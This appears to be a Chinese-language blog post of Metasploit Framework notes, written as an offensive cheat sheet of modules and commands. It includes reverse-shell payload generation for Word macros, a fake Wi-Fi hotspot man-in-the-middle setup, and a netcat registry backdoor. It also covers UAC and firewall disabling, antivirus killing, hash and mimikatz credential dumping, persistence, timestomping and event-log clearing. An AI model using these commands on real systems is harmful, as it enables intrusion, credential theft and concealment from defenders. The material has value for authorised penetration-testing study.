Metasploit Framework笔记

本文总阅读量
  9 mins to read  

简介

Metasploit Framework是一个使用Ruby写成的集成渗透测试框架,涵盖了信息搜集,漏洞利用,提权,后渗透阶段的大多数功能,一个框架的意义便在于此。

MSF后台有Postgresql数据库,收集了近十几年的将近1800个Exp,以及200多个针对各个平台的Payload(应该是这个数字,记不太清而且好久没更新了)。MSF的数据库开在主机的5432端口,首先

service postgresql start

netstat -ano | grep 5432查看是否启动


信息收集

MSF可以调用Nessus,Openvas或Nmap等进行漏洞扫描,扫描后可以通过

creds账号密码

vulns漏洞

loot哈希

除此之外,MSF还有不少漏洞扫描模块,都在auxiliary/scanner

SNMP扫描

vim /etc/default/snmpd修改为0.0.0.0

use auxiliary/scanner/snmp/snmp_login

use auxiliary/scanner/snmp/snmp_enum

use auxiliary/scanner/snmp/snmp_enumusers

use auxiliary/scanner/snmp/snmp_enumshares

SMB扫描

use auxiliary/scanner/smb/smb_version

use auxiliary/scanner/smb/smb_enumshares共享枚举

use auxiliary/scanner/smb/smb_enumusers用户枚举

use auxiliary/scanner/smb/smb_lookupsidsid枚举(系统用户sid)

SSH扫描

(SSH1 SSH1.9存在安全隐患)

use auxiliary/scanner/ssh/ssh_login爆破

use auxiliary/scanner/ssh/ssh_login_pubkey公钥登录

MSSQL扫描

(TCP 1433/UDP 1434)

use auxiliary/scanner/mssql/mssql_ping

use auxiliary/scanner/mssql/mssql_login

use auxiliary/scanner/mssql/mssql_exec

FTP扫描

use auxiliary/scanner/ftp/ftp_version

use auxiliary/scanner/ftp/anonymous

弱点扫描

VNC扫描(5900 Port)use auxiliary/scanner/vnc/

RDP远程桌面use auxiliary/scanner/rdp/ms12_020_check

设备后门扫描use auxiliary/scanner/ssh/juniper_backdoor

use auxiliary/scanner/ssh/fortinet_backdoor

HTTP弱点扫描

use auxiliary/scanner/http/dir_listing(file_dir)   目录及文件
use auxiliary/scanner/http/tomcat_mgr_login   admin后台
use auxiliary/scanner/http/verb_auth_bypass   http身份验证绕过
use auxiliary/scanner/http/wordpress_login_enum   wp暴力破解

SIP端点扫描

auxiliary/scanner/sip/options
auxiliary/scanner/sip/enumerator        //VOIP服务,IP电话

auxiliary/voip/sip_invite_spoof         //伪造通话
exploit/windows/sip/sipxphone_cseq      //渗透

SCADA系统

exploit/windows/scada/realwin_scpc_initialize

利用Shodan扫描

auxiliary/gather/shodan_search

漏洞利用

选定Payload后generate生成载荷代码

generate::

args 
-b除去坏字符如’\x00’
-e选择encoder
-i编码次数
-t输出格式如raw,exe
-x绑定程序
-f输出文件名
-p系统架构如android
-sNOP sled字节长度,利于EIP精确定位

其中有一种基于内存的非常强大的Payload,名叫Meterpreter

command 
run/bgrun运行子模块
clearev删除日志
download下载文件到lpwd目录
execute -f/H/i执行程序 指定/隐藏/交互
load priv/getsystem提权
migrate [PID]迁移进程
idletime查看待机时间
getuid查看当前权限

Acrobat Reader漏洞

exploit/windows/filefoemat/adobe_utilprintf   Adobe Reader v 8.1.2 win xp
exploit/windows/filefoemat/adobe_pdf_embedded_exe   Adobe Reader v 8.x, v 9.x win xp/vis/7
exploit/windows/browser/adobe_utilprintf   构建网页

Flash漏洞

exploit/multi/browser/adobe_flash_hacking_team_uaf
exploit/multi/browser/adobe_flash_opaque_background_uaf

IE漏洞

exploit/windows/browser/ms_14_064_ole_code_execution

Word漏洞

exploit/windows/filefoemat/ms10_087_rtf_pfragments_bof

JRE漏洞

exploit/multi/browser/java_jre17_driver_manager
exploit/multi/browser/java_jre17 _jmxbean
exploit/multi/browser/java_jre17_reflection_types

Word宏Payload

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=1.1.1.1 LPORT=4444 -f vba-exe
//part 1 为宏代码
//part 2 为word正文
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof

浏览器Autopwn

auxiliary/server/browser_autopwn

两种利用方法:

  • xss手段注入代码,<iframe src = “” width=0 height=0 style=”hidden” frameboarder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
  • DNS劫持

伪造热点中间人攻击

airmon-ng start wlan0
airbase-ng -P -C 30 -e "FREE-CMCC" -v wlan0mon
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0      //激活at0
touch /var/lib/dhcp/dhcpd.leases        //建立Dhcp租约
dhcpd -cf /etc/dhcp/dhcpd.conf at0      //启动Dhcp服务器
msfconsole  -q -r karma.rc_.txt

//使客户端联网,开启ip转发
iptables -P FORWARD ACCEPT
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

后渗透阶段

绕过UAC

exploit/windows/local/ask
set filename => winupdate.exe

exploit/windows/local/bypassuac
exploit/windows/local/bupassuac_injection

//通过注册表项
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f

基于已有Session提权

exploit/windows/local/ms13_053_schlamperei      //win7
exploit/windows/local/ms13_081_track_popup_menu
exploit/windows/local/ms13_097_ie_registry_symlik
exploit/windows/local/ppr_flatten_rec

Graphical Payload

payload/windows/vncinject/reverse_tcp

Hash Dump

meterpreter>> load priv
meterpreter>> hash dump

哈希密文登录

exploit/windows/smb/psexec
set smbpass => [hash]
//需关闭UAC

关闭firewall

//需admin/system权限
netsh advfirewall set allprofiles state on/off
net stop windefend

磁盘加密Bitloker

manage-bde -off c:
manage-bge -status c:

关闭DEP

bcdedit.exe /set {current} nx AlwaysOff

Kill 杀毒软件

run killav
post/windows/manage/killav

开启远程桌面

post/windows/maange/enable_rdp
run multi_console_command -rc [file]        //生成资源文件可用来关闭复原

run getgui -e
run getgui -u admin -p 123      //添加3389用户组

获取系统Tokens

load incognito
lisk_tokens -u
impersonate_token lab \\admin
execute -f cmd.exe -i -t(使用当前Token)

exploit/windows/local/ms10_015_kitrapod

注册表添加后门

upload /usr/share/windows_binaries/nc.exe c:\\windows\\system32
reg enumkey HKLM\\software\\microsoft\\windows\\currentversion\\run     //枚举
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 444 -e cmd.exe'        //设定值
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc       //查询生效

打开防火墙端口

execute -f cmd -i -H
netsh firewall show opmode
netsh firewall add portopening TCP 444 "test" ENABLE ALL
shutdown -r -t 0

抓包

抓包缓存于硬盘,全程SSL加密

load sniffer
sniffer_interfaces
sniffer_start [id]
sniffer_dump [id] *.cap

解包

use auxiliary/sniffer/psnuffle
set PCAPFILE => *.cap

John The Ripper破解弱口令

post/windows/gather/hashdump
auxiliaty/analyze/jtr_crack_fast

修改文件系统MAC时间

M: Modified

A: Accessed

C: Changed

Linux下touch指令修改

Timestomp -v 1.txt
          -f c:\\2.txt 1.txt      //获取模版时间
          -z        //全改

路由转发

获取shell后»扫描内网

run autoroute -s 1.1.1.0/24
              -p    //查看已添加路由

扫描内网

auxiliary/scanner/portscan/tcp

端口转发

获取shell后

>> portfwd -add -L [local ip] -l [local port] -r [remote ip] -p [remote port]
>> portfwd list/delete/flush

POST模块

post/windows/gather/arp_scanner

post/windows/gather/checkvm         //测试虚拟机

post/windows/gather/credentials/credential_collector        //查主机账号和hash

post/windows/gather/enum_applications       //应用扫描

post/windows/gather/enum_logged_on_users        //当前登录账号

post/multi/recon/local_exploit_suggester        //本地提权漏洞

post/windows/manage/delete_user     //删用户

post/multi/gather/env       //搜集环境信息

post/multi/gather/firefox_creds     //火狐保存账号密码

post/multi/gather/ssh_creds         //ssh

post/multi/gather/chesk_malware     //恶意软件检测

持久化后门

run metsvc -A
use exploit/multi/handler
set payload windows/metsvc_bind_tcp

run persistence -h
                -X 自启动
                -r [ip]
                -i 延迟启动

mimikatz密码

getsystem
load mimikatz
kerberos/wdigest/msv/ssp
mimikatz_command -f a::         //查看模块
                    samdump::
                    handle::

清除痕迹

run event_manager -i 显示
                  -c 清除
      
                  
clearv

基于Session钓鱼

post/windows/manage/inject_host     //host文件注入
post/windows/gather/phish_login_pass        //钓鱼